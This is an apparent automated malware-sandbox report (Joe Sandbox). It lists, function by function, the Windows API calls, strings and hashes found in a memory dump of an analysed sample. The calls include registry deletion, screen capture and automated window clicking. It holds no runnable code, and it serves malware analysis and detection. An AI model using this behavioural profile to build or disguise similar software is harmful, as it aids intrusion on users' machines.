                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A9C10E,?,?), ref: 00A9D415
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D451
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D4C8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D4FE
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A9C154
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A9C1D2
                                                                                                                                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 00A9C26A
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00A9C2DE
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00A9C2FC
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A9C352
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A9C364
                                                                                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A9C382
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00A9C3E3
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00A9C3F4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 96a326548afaacf043bdb6bf0e6d2117fa666698e4e886258011ed664ff228f5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 922dbf78d043cc23b3daad654f36686c95db9f7f3407d1fc47b98154e6ba693f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96a326548afaacf043bdb6bf0e6d2117fa666698e4e886258011ed664ff228f5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6C19F30208601AFDB10DF54C485F6ABBE1FF85314F54859CF4AA8B6A2CB35ED86CB91
                                                                                                                                                                                                                                                                                                    Function 00A92FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00A93035
                                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00A93045
                                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00A93051
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00A9305E
                                                                                                                                                                                                                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00A930CA
                                                                                                                                                                                                                                                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00A93109
                                                                                                                                                                                                                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00A9312D
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00A93135
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00A9313E
                                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 00A93145
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00A93150
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1cf819f723e2e27d8c34b3372843926bbe374a9dc26cc6005136c8d22b86fb05
                                                                                                                                                                                                                                                                                                    • Instruction ID: 12cc1425acbeca983f073bf026104322b06638ef25847162471ca418a98e6128
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cf819f723e2e27d8c34b3372843926bbe374a9dc26cc6005136c8d22b86fb05
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4461C1B6E00219AFCF04CFA4D984AAEBBF5FF48310F208529E556A7250D771A941CF90
                                                                                                                                                                                                                                                                                                    Function 00AAA94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A124B0
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00AAA990
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00AAA9A7
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00AAA9B3
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00AAA9C9
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00AAAC15
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00AAAC33
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00AAAC54
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00AAAC73
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00AAAC95
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000005,?), ref: 00AAACBB
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                                    • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                                                    • Opcode ID: 806f5b62934cadaf959887ec3957951c1fc8c2283c284671c24e3accf1801da3
                                                                                                                                                                                                                                                                                                    • Instruction ID: cd16e6ab1ac2e65e80a31e747bec99437e37807a04d3679de94ae35fbfd01f13
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 806f5b62934cadaf959887ec3957951c1fc8c2283c284671c24e3accf1801da3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67B1883160021AEFDF14CFA8C9847AE7BF2FF55710F188069EC49AB295D775A980CB61
                                                                                                                                                                                                                                                                                                    Function 00A752AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00A752E6
                                                                                                                                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00A75328
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A75339
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00A75345
                                                                                                                                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00A7537A
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00A753B2
                                                                                                                                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00A753EB
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00A75445
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00A75477
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00A754EF
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                    • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                                    • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                                                    • Opcode ID: 44e0800ab4dfd16fbeb7128bf349d1652adc3d5c41f516d39c90565518b6f3f3
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1bd5eaea49059a9ec16a9c78d033c117e85c3190e25d64d085ad47ab2cad6abd
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44e0800ab4dfd16fbeb7128bf349d1652adc3d5c41f516d39c90565518b6f3f3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0591B371904B06AFD704CF34CD94AAAB7AAFF41304F00C519FA9A86091EBB1ED56CB91
                                                                                                                                                                                                                                                                                                    Function 00AA976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A124B0
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AA97B6
                                                                                                                                                                                                                                                                                                    • GetFocus.USER32 ref: 00AA97C6
                                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00AA97D1
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00AA9879
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00AA992B
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00AA9948
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00AA9958
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00AA998A
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00AA99CC
                                                                                                                                                                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AA99FD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: f03c5eaa60ca099ca11fde96ab924d79804180c1022182746823f1e4ba612735
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9d9ab4511d317ac07fdfea505d825e02628e8565c7da56e5a7f0f5629484a940
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f03c5eaa60ca099ca11fde96ab924d79804180c1022182746823f1e4ba612735
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E581B071904311AFDB10CF24C984AABBBE8FF8A354F00091DF985972D1DB74D905CBA2
                                                                                                                                                                                                                                                                                                    Function 00A7C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00AE29C0,000000FF,00000000,00000030), ref: 00A7C973
                                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(00AE29C0,00000004,00000000,00000030), ref: 00A7C9A8
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 00A7C9BA
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00A7CA00
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00A7CA1D
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00A7CA49
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00A7CA90
                                                                                                                                                                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A7CAD6
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A7CAEB
                                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A7CB0C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: 547cf0b0860be82cafdb60fa1f7361413388f6cdab4b9f5274c9c82b3b82dd42
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0fb2c6a7ed726b4fec66360ebaed351be5740becc8e6a9fe9e6b81fe02954244
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 547cf0b0860be82cafdb60fa1f7361413388f6cdab4b9f5274c9c82b3b82dd42
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B261917090024AAFDF11CFA4DD89AEE7BB9FB453A8F04C019F95AA7191D734AD01CB60
                                                                                                                                                                                                                                                                                                    Function 00A7E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00A7E4D4
                                                                                                                                                                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00A7E4FA
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7E504
                                                                                                                                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00A7E554
                                                                                                                                                                                                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00A7E570
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                                    • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                                                    • Opcode ID: 683b078e6bad6b7f0aac227043e5de1149acfb897cbcda5cd0622a5bc369f489
                                                                                                                                                                                                                                                                                                    • Instruction ID: 835b857d203e82c9e16a6677538326ef2e040b8b9acfa2ccacddb16abd494cd3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 683b078e6bad6b7f0aac227043e5de1149acfb897cbcda5cd0622a5bc369f489
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 854126726002147ADB04EB749D47EFF776CEF59720F00846AF905A61C2FB749A01A2A5
                                                                                                                                                                                                                                                                                                    Function 00A9D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A9D6C4
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00A9D6ED
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A9D7A8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00A9D70A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00A9D71D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A9D72F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A9D765
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A9D788
                                                                                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A9D753
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 15af75e8265d13bf33ae90dfd6bcabce20fba9845ce9667080f21c3293213223
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2b3ffaab0ec7e3522a82ce95b0616a6a17f85d4101f102968e8955deadbf027f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15af75e8265d13bf33ae90dfd6bcabce20fba9845ce9667080f21c3293213223
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6316075A01129BBDB21DBD1DC88EFFBBBCEF46750F000165F946E2140DB349E869AA0
                                                                                                                                                                                                                                                                                                    Function 00A7EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • timeGetTime.WINMM ref: 00A7EFCB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A2F215: timeGetTime.WINMM(?,?,00A7EFEB), ref: 00A2F219
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00A7EFF8
                                                                                                                                                                                                                                                                                                    • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00A7F01C
                                                                                                                                                                                                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00A7F03E
                                                                                                                                                                                                                                                                                                    • SetActiveWindow.USER32 ref: 00A7F05D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A7F06B
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00A7F08A
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00A7F095
                                                                                                                                                                                                                                                                                                    • IsWindow.USER32 ref: 00A7F0A1
                                                                                                                                                                                                                                                                                                    • EndDialog.USER32(00000000), ref: 00A7F0B2
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
